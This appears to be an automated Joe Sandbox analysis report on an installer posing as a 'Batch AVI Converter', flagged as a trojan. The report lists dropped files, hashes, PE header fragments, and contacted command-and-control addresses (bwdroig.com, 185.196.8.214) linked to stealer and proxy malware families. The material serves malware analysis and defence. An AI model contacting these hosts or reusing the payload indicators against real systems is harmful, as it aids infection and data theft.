        C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://sectigo.com/CPS00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://www.innosetup.com/0%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%Avira URL Cloudsafe
        http://crl.certum.pl/ctnca.crl0k0%Avira URL Cloudsafe
        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU0%Avira URL Cloudsafe
        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline0%Avira URL Cloudsafe
        http://repository.certum.pl/ctnca.cer090%Avira URL Cloudsafe
        http://185.196.8.214/0%Avira URL Cloudsafe
        http://ocsp.thawte.com00%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%Avira URL Cloudsafe
        http://repository.certum.pl/cscasha2.cer00%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%Avira URL Cloudsafe
        http://www.openssl.org/support/faq.html0%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%Avira URL Cloudsafe
        http://crl.certum.pl/cscasha2.crl0q0%Avira URL Cloudsafe
        http://cscasha2.ocsp-certum.com040%Avira URL Cloudsafe
        https://www.certum.pl/CPS00%Avira URL Cloudsafe
        http://185.196.8.214/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df10%Avira URL Cloudsafe
        http://bwdroig.com/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c390%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%Avira URL Cloudsafe
        http://www.remobjects.com/psU0%Avira URL Cloudsafe
        http://crl.thawte.com/ThawteTimestampingCA.crl00%Avira URL Cloudsafe
        bwdroig.com0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%Avira URL Cloudsafe
        http://185.196.8.214/sea0%Avira URL Cloudsafe
        http://www.remobjects.com/ps0%Avira URL Cloudsafe
        http://subca.ocsp-certum.com010%Avira URL Cloudsafe
        http://www.certum.pl/CPS00%Avira URL Cloudsafe
        https://www.openssl.org/H0%Avira URL Cloudsafe
        http://www.openssl.org/f0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bwdroig.com
        		185.196.8.214
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://bwdroig.com/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39true
          • Avira URL Cloud: safe
          		unknown
          bwdroig.comtrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.innosetup.com/file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.196.8.214/batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://sectigo.com/CPS0is-7PIOL.tmp.1.drfalse
          • URL Reputation: safe
          		unknown
          http://repository.certum.pl/ctnca.cer09is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://repository.certum.pl/cscasha2.cer0is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0is-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://ocsp.sectigo.com0is-7PIOL.tmp.1.drfalse
          • URL Reputation: safe
          		unknown
          http://crl.certum.pl/ctnca.crl0kis-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUfile.exefalse
          • Avira URL Cloud: safe
          		unknown
          http://ocsp.thawte.com0is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#is-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinefile.exefalse
          • Avira URL Cloud: safe
          		unknown
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#is-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.certum.pl/CPS0is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.certum.pl/cscasha2.crl0qis-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://cscasha2.ocsp-certum.com04is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.openssl.org/support/faq.htmlis-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tis-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.remobjects.com/psUfile.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.196.8.214/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1batchaviconverter32_64.exe, 00000003.00000002.3334036790.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yis-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.thawte.com/ThawteTimestampingCA.crl0is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#is-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://subca.ocsp-certum.com01is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.openssl.org/His-7PIOL.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.remobjects.com/psfile.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.openssl.org/fis-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.196.8.214/seabatchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.certum.pl/CPS0is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.drfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          185.196.8.214
          		bwdroig.comSwitzerland
          		34888SIMPLECARRER2ITtrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1509605
          Start date and time:2024-09-11 21:04:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 4s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@6/27@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 92%
          • Number of executed functions: 176
          • Number of non-executed functions: 262
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
          • Report size getting too big, too many NtDeviceIoControlFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe

          Simulations

          Behavior and APIs

          TimeTypeDescription
          15:05:36API Interceptor541342x Sleep call for process: batchaviconverter32_64.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.196.8.214file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
            file.exeGet hashmaliciousSocks5SystemzBrowse
              file.exeGet hashmaliciousSocks5SystemzBrowse
                file.exeGet hashmaliciousSocks5SystemzBrowse
                  install.exeGet hashmaliciousSocks5SystemzBrowse
                    install.exeGet hashmaliciousSocks5SystemzBrowse
                      qgdf1HLJno.exeGet hashmaliciousSocks5SystemzBrowse
                        install.exeGet hashmaliciousSocks5SystemzBrowse
                          install.exeGet hashmaliciousSocks5SystemzBrowse
                            gobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SIMPLECARRER2ITfile.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                              • 185.196.8.214
                              file.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              file.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              file.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              install.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              install.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              qgdf1HLJno.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              install.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              install.exeGet hashmaliciousSocks5SystemzBrowse
                              • 185.196.8.214
                              gobEmOm5sr.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                              • 185.196.8.214

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                    gn22aYCGh4.exeGet hashmaliciousUnknownBrowse
                                      setup.exeGet hashmaliciousUnknownBrowse
                                        C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmpfile.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                install.exeGet hashmaliciousSocks5SystemzBrowse
                                                  install.exeGet hashmaliciousSocks5SystemzBrowse
                                                    J6oTAcCqhp.msiGet hashmaliciousDanaBotBrowse
                                                      setup (1).exeGet hashmaliciousUnknownBrowse
                                                        Endermanch@XPAntivirus2008.exeGet hashmaliciousUnknownBrowse
                                                          Endermanch@XPAntivirus2008.exeGet hashmaliciousUnknownBrowse

                                                            Created / dropped Files

                                                            C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2644388
                                                            Entropy (8bit):6.6214078319430225
                                                            Encrypted:false
                                                            SSDEEP:24576:vh2bAqsaRXVK6ktBdb4Rm8WceEuB0RHx3hryveaNHewUa7I1sJ4W/hYd4kD2t80k:5IAqsanks023dFn0RnWOINjzdABSaK
                                                            MD5:91646D419442B59CE172BCBAE8A2A8C9
                                                            SHA1:FE2949DBB51067D70E474C5D11A744DC6F165350
                                                            SHA-256:E1C41574C9889CB05922896464BF19298129F0401174DA3FA8F107B2AD0141B5
                                                            SHA-512:D535468FADD5BDE87A8DC3FCADF1A2699E72CE9E6F7C8C1C07EEBA05ADD140AA3AED2ACBD047D8F28B97EDF0423DC61A594D707DD4B8DF1951A0ABC69DBDC395
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L..........#......P...P.......X.......`....@...........................(.............................................,i..T....................................................................................`...............................text...\J.......P.................. ..`_areg_2.R;...`...@...`..............@..@.data...8 ..........................@....rsrc...............................@..@_breg_2.............................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\dk911-it-45.dat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8
                                                            Entropy (8bit):2.0
                                                            Encrypted:false
                                                            SSDEEP:3:k5tn:kzn
                                                            MD5:DDB4D886C3CB7434AFE7EC02169EC004
                                                            SHA1:4E4958973F443E40E46CE44332CB7C2AB15C481E
                                                            SHA-256:9C88584ADD662B6B6FBA9B1CAA26065FB506F60F95C29B3BECE999219700F77B
                                                            SHA-512:7858F09019D71BBAC5291F7D59C5C086726E5CE10E61441C179B372B8952528485B6ED2AA8EA9ED56EBF61362CB66F8CC7093AC2F5FBD8A98B4684DBAD4F20DB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...f....

                                                            C:\ProgramData\dk911-rc-45.dat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):0.8112781244591328
                                                            Encrypted:false
                                                            SSDEEP:3:3:3
                                                            MD5:E7C62CD2306A6B991402DB2098965CBC
                                                            SHA1:33B77B9463AB2010488CDCFC5CE920E05602EE50
                                                            SHA-256:2BAAED212BEBC4EBEEB19752C47FF7C4420ADF7806F577722B487A08B605EE13
                                                            SHA-512:B3D72EE590E359259032335B4BBC2C7C400BAD09492D341C8FC9A20908FC4C96277861C561257399BF3A2C4C88E0E15634B8CB0DEAAFD8A8E21ADB72086A6825
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:`...

                                                            C:\ProgramData\dk911-res-a.dat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):128
                                                            Entropy (8bit):2.9545817380615236
                                                            Encrypted:false
                                                            SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                            MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                            SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                            SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                            SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                            C:\ProgramData\dk911-res-b.dat

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):128
                                                            Entropy (8bit):1.2701231977328944
                                                            Encrypted:false
                                                            SSDEEP:3:WAmJuXDz8/:HHzc
                                                            MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                            SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                            SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                            SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:ccddf9e705966c2f471db9..........................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):334848
                                                            Entropy (8bit):6.5257884005400015
                                                            Encrypted:false
                                                            SSDEEP:6144:JmuFcP82IqE5RSbvQpYVgMW2i32blpDW2pmoZ1:JmuFc02IqE7SbLVgR1O
                                                            MD5:C1D465E061D7D02895DAEB19BDB28AC9
                                                            SHA1:5E729EE51DF080545C7031D771B85094A2B2D4E9
                                                            SHA-256:777917D30F277A9E88D8FC04E69B955A2B0BD3F2BCF2E36F7F9CFFEF2583EE60
                                                            SHA-512:438ADAA0AC3AD47621D288E3FF56493CC7DE4E2A89FC5420E246A6045DB79E7CB84A28D3F3420841340AB33BD632F12FDC3A4E9D8EF99601CA9F975B7F8309E1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: gn22aYCGh4.exe, Detection: malicious, Browse
                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............a.................................g........ ......................P..Z........j...p..8.......................d............................`......................@................................text...............................`.P`.data...............................@.0..rdata...s.......t..................@.p@.eh_framD....p.......<..............@.0@.bss....H....@........................p..edata..Z....P......................@.0@.idata...j.......l..................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...8....p......................@.0..reloc..d........ ..................@.0B........................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):2644388
                                                            Entropy (8bit):6.6214078319430225
                                                            Encrypted:false
                                                            SSDEEP:24576:vh2bAqsaRXVK6ktBdb4Rm8WceEuB0RHx3hryveaNHewUa7I1sJ4W/hYd4kD2t80k:5IAqsanks023dFn0RnWOINjzdABSaK
                                                            MD5:91646D419442B59CE172BCBAE8A2A8C9
                                                            SHA1:FE2949DBB51067D70E474C5D11A744DC6F165350
                                                            SHA-256:E1C41574C9889CB05922896464BF19298129F0401174DA3FA8F107B2AD0141B5
                                                            SHA-512:D535468FADD5BDE87A8DC3FCADF1A2699E72CE9E6F7C8C1C07EEBA05ADD140AA3AED2ACBD047D8F28B97EDF0423DC61A594D707DD4B8DF1951A0ABC69DBDC395
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L..........#......P...P.......X.......`....@...........................(.............................................,i..T....................................................................................`...............................text...\J.......P.................. ..`_areg_2.R;...`...@...`..............@..@.data...8 ..........................@....rsrc...............................@..@_breg_2.............................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):499712
                                                            Entropy (8bit):6.414789978441117
                                                            Encrypted:false
                                                            SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                            MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                            SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                            SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                            SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: install.exe, Detection: malicious, Browse
                                                            • Filename: install.exe, Detection: malicious, Browse
                                                            • Filename: J6oTAcCqhp.msi, Detection: malicious, Browse
                                                            • Filename: setup (1).exe, Detection: malicious, Browse
                                                            • Filename: Endermanch@XPAntivirus2008.exe, Detection: malicious, Browse
                                                            • Filename: Endermanch@XPAntivirus2008.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-6PQC1.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2644388
                                                            Entropy (8bit):6.621407877657935
                                                            Encrypted:false
                                                            SSDEEP:24576:4h2bAqsaRXVK6ktBdb4Rm8WceEuB0RHx3hryveaNHewUa7I1sJ4W/hYd4kD2t80k:UIAqsanks023dFn0RnWOINjzdABSaK
                                                            MD5:0DD5C324D490B0668ED4F13C33090DD9
                                                            SHA1:CBEED0B207CCD1E94D085D9D48B7C17007C29AC1
                                                            SHA-256:16102665BB0AB5919913534901D43A8CC7F013FABB5D497E7AEF7DE10DEC231A
                                                            SHA-512:14FB27DD16FBF15C9734A280B393B73C533A085C261AD22C587EF07223A86FF35C59A630878B99E2671A2A29945982E5D62561F34C009E592B9958EABD7D8D1E
                                                            Malicious:false
                                                            Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L..........#......P...P.......X.......`....@...........................(.............................................,i..T....................................................................................`...............................text...\J.......P.................. ..`_areg_2.R;...`...@...`..............@..@.data...8 ..........................@....rsrc...............................@..@_breg_2.............................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):719720
                                                            Entropy (8bit):6.620042925263483
                                                            Encrypted:false
                                                            SSDEEP:12288:ST+z0ucMr64M+yiwUqfWY/EThHzgOXfpwN9Cu66vLHL1e13XYFU8HtUDsMBPxtFe:FPAeKLL1e6kpqsookesEiU1xJycD4R1z
                                                            MD5:20B6B06BBD211A8ACFE51193653E4167
                                                            SHA1:817D442B46DD6F35FD9641E0C7262C934ED76848
                                                            SHA-256:7A16E6ED0C0A49AEB8EA4972600A7A1422C92550602A150634B1C221F79300B4
                                                            SHA-512:0F0C31D46E7274F28F62AFBBB4A172CB088AF40F6C71A56297B08D83D16548C0A4FDA4CF5F4A29C1445EEDF15FE81FC405E2EB8680F92C744406D031A05A72C8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+X?|o9Q/o9Q/o9Q/{RR.e9Q/{RT..9Q/{RU.}9Q/{RP.m9Q/=QT.r9Q/=QU.`9Q/=QR.z9Q/.PP.l9Q/o9P/j;Q/.PU.C9Q/.PQ.n9Q/.P./n9Q/.PS.n9Q/Richo9Q/................PE..L...3..c...........!.....d...~......Z........................................ .......9....@.............................4@...)..<.......................h).......S..@...T...............................@............................................text...Lb.......d.................. ..`.rdata...............h..............@..@.data...`I...`...6...D..............@....rsrc................z..............@..@.reloc...S.......T...~..............@..B........................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Batch AVI Converter\is-9JGQO.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):717985
                                                            Entropy (8bit):6.514913383862237
                                                            Encrypted:false
                                                            SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+aIq5MRxyFA:SPcYn5c/rPx37/zHBA6pFptZ1CELqMRJ
                                                            MD5:B07AF47E786B74FA5BD4F50FB05090A4
                                                            SHA1:E14A663A6E0CCC6D0D767178053740CDAC1B5A84
                                                            SHA-256:60481C96BCE7CBB54A8ACF839416CEE2718E4FA7A9720DFE70972E1B5ED12E9F
                                                            SHA-512:47E44D559485865EAE1E23BFCC9FE512DFA00D6278553C0AD3168B426A1DE9B400811A058E3DC23B349A16DD030410A4F530DECADF37352E12C43A3F20F37E2A
                                                            Malicious:true
                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

